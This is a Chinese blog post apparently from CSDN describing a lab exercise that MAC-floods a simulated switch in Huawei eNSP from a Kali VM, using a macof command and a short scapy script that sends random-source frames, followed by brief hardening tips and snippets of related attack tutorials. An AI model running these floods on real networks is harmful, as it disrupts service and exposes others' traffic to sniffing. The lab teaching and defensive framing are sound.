使用ensp进行mac泛洪实验

已于 2024-09-06 17:01:24 修改
阅读量393 收藏 6
点赞数 9
文章标签: macos 网络 网络安全
于 2024-09-06 16:55:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_76902210/article/details/141962518
版权

目录

前言

使用macof进行mac泛洪

使用python的scapy模块进行攻击

加固方法

前言

实验之前我们首先要知道数据链路层的协议,电脑通过交换机的mac地址表进行寻址通信,但是mac地址表有限,通过一直向交换机发送mac地址让它存储爆表就能实现通讯中断。

使用macof进行mac泛洪

准备工具:虚拟机kali:192.168.18.131/24

                  虚拟机windows ensp

打开ensp配置拓扑图

cloud的配置如下,因为是虚拟机,所有自己选用nat网段

连接后配置pc的ip,配成和cloud一个网段的

现在ping测试,结果成功

kal点击命令

sudo macof -d 192.168.18.199

现在已经ping失败了,不通了

查看交换机mac地址表,已经爆满

kali停止攻击后等待两分钟再查看,又可以ping通了

大概五分钟后,mac地址表恢复正常

实验结束

使用python的scapy模块进行攻击

python代码如下,循环可以自己修改

from scapy.all import Ether, sendp, RandMAC

# 创建一个以太网帧,源MAC地址是随机生成的
#packet = Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff") / "MAC Flooding Test"

for _ in range(100000):
    packet = Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff") / "MAC Flooding Test"
    sendp(packet)

运行效果如图

运行之后是一样的结果

实验结束

加固方法

在cloud端口开启端口安全

还可以使用静态mac地址绑定。

更多方法得自己去了解了。

白世珠
关注
使用macof发起MAC地址泛洪攻击
Liu_Bruce的博客
05-04 1016
MAC地址泛洪攻击是一种针对交换机的攻击方式,目的是监听同一局域网中用户的通信数据。交换机的工作核心:端口- MAC地址映射表。这张表记录了交换机每个端口和与之相连的主机MAC地址之间的对应关系。通常情况下,交换机的每个端口只会连接一台主机,因而在CAM表中每个端口只对应一个MAC地址。由于交换机的缓存有限,因此它的CAM表中能保存的内容也是有限的。现在交换机都使用级联技术,也就是A交换机可以连接到B交换机的级联端口。这样B交换机的级联端口上就对应多台主机的MAC地址,从而在CAM表中产生大量的记录。
MAC地址泛洪——华为ensp
qq_62987084的博客
07-23 472
MAC地址泛洪 实验
简述利用虚拟机kali系统与eNSP进行泛洪攻击实验
2301_79726973的博客
01-14 732
设置云的参数,点击增加-在绑定信息中选择与kali系统ip相符合的选项-在端口映射中 入端口编号与出端口编号 其中一个选择2一个选择1 标记双向通道-确定。用 dis mac-address 命令查看信息是否与主机1 、2的MAC地址信息相符。先查看kali 系统的ip 然后在eNSP中分别设置主机1和主机2的ip地址。利用ping 命令 检查主机1和主机2 一直保持连通。在kali中用macof -i eth0命令开始攻击。注:本文章仅供本人参考学习。Ctrl+C 退出程序。
Kali Linux —— ensp仿真模拟交换机Mac泛洪攻击
ChenD的学习笔记
09-20 3931
Kali利用交换机MAC地址泛洪漏洞
HUAWEI—ensp和vm16进行模拟仿真对交换机进行泛洪攻击
m0_74025111的博客
11-05 566
这里将server设置成为web服务器,配置相关的网站访问服务,先给服务器配上ip,跟Cloud同网段即可:192.168.178.10,其他的配置如何下图。8.备份和紧急响应计划:确保备份交换机配置,并制定灵活的紧急响应计划,以便在出现泛红攻击或其他网络安全事件时能够快速响应和恢复。描述:泛红攻击(Flood Red)是一种对交换机进行的DoS(拒绝服务)攻击,旨在耗尽交换机的处理能力和网络带宽。所有配置的工作都已完成,接下来进行攻击实验,启动kali,利用macof进行泛红攻击。
MAC地址泛洪攻击实验
weixin_42594971的博客
01-09 1345
MAC地址的泛洪攻击实验,在eNSP的基础上,使用kali系统进行攻击mac地址实验
Kali Linux—eNSP模拟交换机MAC地址泛洪攻击
xrgzky的博客
12-01 3581
此时ensp的信息,由于mac地址表被顶满,所以会吧数据发到所有的数据端口。我们回到wirsker。我们会看到刚才被广播的ftp包,追踪TCP数据流,就可以看到登录的刚刚登录的账号和密码。(2)服务器Server1 配置地址192.168.1.2。由于mac地址表满了无法学习新的地址,所以登录失败。并启动FTP服务,文件目录随便选要点启动。本地环境联通,我们进入kali端。我们现在清空地址表,开始实验。(4)测试两台终端连通性。删除完成mac地址表为空。由于太多系统将他自动分页。我们关闭攻击再次登录。
使用 eNSP 模拟交换机防御 ARP 泛洪攻击
Flag少侠的博客
03-31 2481
ARP(地址解析协议)泛洪攻击是一种网络攻击手法,利用 ARP 协议的工作方式来实施。ARP 协议用于将 IP 地址映射到 MAC 地址,以便在局域网中发送数据包。ARP 泛洪攻击的基本原理是向网络中广播大量伪造的 ARP 请求,欺骗目标主机将其 ARP 缓存表中的 IP 地址映射到攻击者控制的 MAC 地址上,导致数据包被发送到错误的目标,从而实现网络中断或拒绝服务(DoS)的攻击目的。:通过欺骗网络中的设备,使其无法正确识别其他设备的 MAC 地址,导致网络通信中断。
泛洪攻击实验
m0_52822871的博客
09-05 904
1.泛洪攻击利用了哪些条件 (1)交换机的MAC学习机制 (2)MAC表项的数据限制 (3)交换机的转发机制 2.实验原理 攻击机向交换机发送多个不同MAC地址的数据包,交换机的MAC学习机制会学习收集到的MAC地址,MAC地址表满了之后,交换机发数据会以广播的形式,从而也将数据发送给了攻击机。 3.泛洪攻击的预防 (1)配置静态MAC转发表 (2)配置端口的MAC学习数目限制 ...
DHCP饥饿攻击解释及实验MAC泛洪攻击、DHCP DoS攻击)
墨痕诉清风的博客
07-11 1165
在弹出的窗口中填写攻击参数,服务器地址为Kali的IP地址,Start IP和End IP写为非VMnet1中的IP地址,其他参数随意写,此时我们便对windows 10主机分配了一个虚假的ip, 使得其无法正常联网。攻击原理:攻击者通过伪造MAC地址持续大量地向DHCP服务器申请IP地址,直到耗尽DHCP服务器地址池的IP地址,使DHCP服务器无法再给正常的主机分配IP地址,使得正常主机不能访问网络。:转发代理(网关)IP 地址,DHCP 客户端发出请求报文后经过的第一个 DHCP 中继的 IP 地址。
交换机Mac泛洪实验以及应对措施
weixin_68521483的博客
03-18 2870
macof 和 泛洪python脚本 ,应对泛洪采取的可行性方法
利用ensp和kali完成mac地址泛洪,内容有: 说出漏洞原理;使用macof工具进行攻击的相关命令和具体怎么做;写一个脚本进行攻击;以及加固方法和实验效果。
09-11
使用macof工具进行MAC地址泛洪攻击的命令示例如下: ```bash macof -i eth0 ``` 这条命令会在eth0网络接口上启动macof工具,持续不断地发送伪造的MAC地址。为了能够更详细地控制攻击过程,可以结合使用tcpdump工具...
MAC地址泛洪攻击,监听用户名和密码。
qq_43623470的博客
01-15 1436
1,使用的工具使用模拟器ensp,虚拟机vm,VirtualBox。 2,新建拓扑图如下: 交换机使用华为s3700 云配置如下: 绑定网卡是virualbox的虚拟网卡,并加上udp端口,下面的端口映射,出端口选择2,并点上双向通道,形成映射。其他两个云类似。用真实网卡做实验会影响自己的真实网络,并且在抓包的时候数据过多,不容易观察。 3,vm虚拟机里的设置 需要安装xp,kali系统,具...
Mac 上终端使用 MySql 记录
Lovely Ruby 的手账
09-11 608
安装的过程需要设置 root 的密码,这个是要进入数据库所设定的,所以要记住。
为什么mac打不开rar文件 苹果电脑打不开rar压缩文件怎么办
软妹子的博客
09-13 961
你也可以手动打开这些软件,然后选择要解压的rar文件,就可以看到解压后的文件或文件夹了。BetterZip不仅可以支持rar文件,还可以支持其他多种压缩文件格式,比如ZIP,TAR,TGZ,TBZ,TXZ,7-ZIP,RAR,ARJ,LHA,LZH,ISO等。rar作为常见的压缩格式,mac会经常遇到这类压缩格式,如果你无法打开rar压缩文档,不妨在自己的mac电脑上安装一款可以解压rar格式的软件,不仅可以解压rar文档,还能解决mac压缩rar文件的问题。1.打开软件,将需要压缩的文件拖入软件页面。
electron有关mac构建
路在脚下,幸福在手中,莫贪!!!!!
09-11 498
执行下面命令,检查下按照的 node.js 版本是不是 intel x64 指令集,如果是的话安装下 arm64 指令集的 node.js终端中执行以下命令:node -p process.arch。针对 Mac M1/2/3 芯片的设备,proces.arch=arm64.勾选 以 Rosetta 打开(Open using Rosetta)。右键点击 终端 应用并选择 获取简介(Get Info)。在 Rosetta 终端中安装nvm与 Node.js。打开 应用程序 文件夹中的 终端 应用。
MacOS Catalina 从源码构建Qt6.2开发库之01: 编译Qt6.2源代码
Joshua的专栏
09-12 1143
MacOS Catalina 从源码构建Qt6.2开发库之01: 编译Qt6.2源代码
Mac 上安装双系统会影响性能吗,安装双系统会清除数据吗?
最新发布
weixin_52324079的博客
09-14 831
Mac 系统安装并使用双系统已经成为了许多用户办公的选择之一,双系统可以让用户在 Mac 上同时运行 Windows 或其他操作系统。然而,许多用户担心这样做会对 Mac 的性能产生影响。接下来将给大家介绍 Mac 装双系统会影响性能吗,Mac装双系统会清空数据吗的具体内容。当我们使用 Mac 装双系统时,需要使用专业的虚拟机软件。安装完成的Windows系统需要借助虚拟机软件才能够在 macOS 中顺利运行,这里给大家介绍一款名为Parallels Desktop的专业Mac系统虚拟机软件。
华为eNSP网络仿真平台使用实验教程
"eNSP使用实验教程详解" 本文档主要介绍了华为的eNSP(Enterprise Network Simulation Platform)软件,这是一个强大的图形化网络仿真工具,旨在帮助用户无风险地学习和实践华为数通系列产品的操作、配置和故障...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值